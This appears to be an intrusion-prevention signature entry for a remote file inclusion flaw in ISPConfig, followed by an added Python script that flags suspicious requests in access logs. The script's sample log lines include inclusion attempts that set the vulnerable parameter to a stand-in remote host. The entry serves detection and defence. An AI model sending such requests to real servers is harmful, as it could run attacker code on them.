ISPConfig.Session.INC.PHP.Remote.File.Inclusion

Description

This indicates a possible exploit of a file inclusion vulnerability in ISPConfig that may allow remote attackers to execute arbitrary PHP code via a URL in the go_info[server][classes_root] parameter.

Affected Products

ISPConfig ISPConfig 2.2.3
ISPConfig ISPConfig 2.2.2

Impact

Compromise of the affected system.

Recommended Actions

The vendor reports that this issue is not exploitable on default configurations of the application, because the vulnerable file is not in the web root. However, the vendor has released an advisory to address this issue for situations where the vulnerable file is accessible remotely.
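
Where the file is reachable remotely, web server access logs can be checked for the request pattern this signature describes. The following is an added example, not part of the original entry or the vendor's detection logic: it flags requests to session.inc.php whose go_info[server][classes_root] query parameter holds a remote URL. The log lines, paths and host names are constructed samples, and the list of URL schemes is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

PARAM = "go_info[server][classes_root]"  # parameter named in the description
SCRIPT = "session.inc.php"               # file named in the signature title
# Assumption: a value starting with one of these schemes counts as a remote URL.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed sample lines (Apache combined format, documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?s=1 HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /lib/session.inc.php?go_info[server][classes_root]=http://remote.example.invalid/ HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /lib/session.inc.php?go_info%5Bserver%5D%5Bclasses_root%5D=hTTps%3A%2F%2Fremote.example.invalid%2F HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /lib/session.inc.php?go_info[server][classes_root]=/opt/app/classes HTTP/1.1" 200 0 "-" "-"',
]


def find_rfi_attempts(lines):
    """Return (client_ip, value) for requests that set PARAM to a remote URL.

    Only the query string is inspected; request bodies do not appear in
    access logs and are not covered by this check.
    """
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group("uri").partition("?")
        # Compare the decoded file name so percent-encoded paths still match.
        if unquote(path).lower().rsplit("/", 1)[-1] != SCRIPT:
            continue
        # parse_qsl percent-decodes names and values, so %5B/%5D forms match.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() == PARAM and REMOTE_SCHEME.match(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{client} set {PARAM} to remote URL {value}")
```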

Coverage

IPS (Regular DB)
IPS (Extended DB)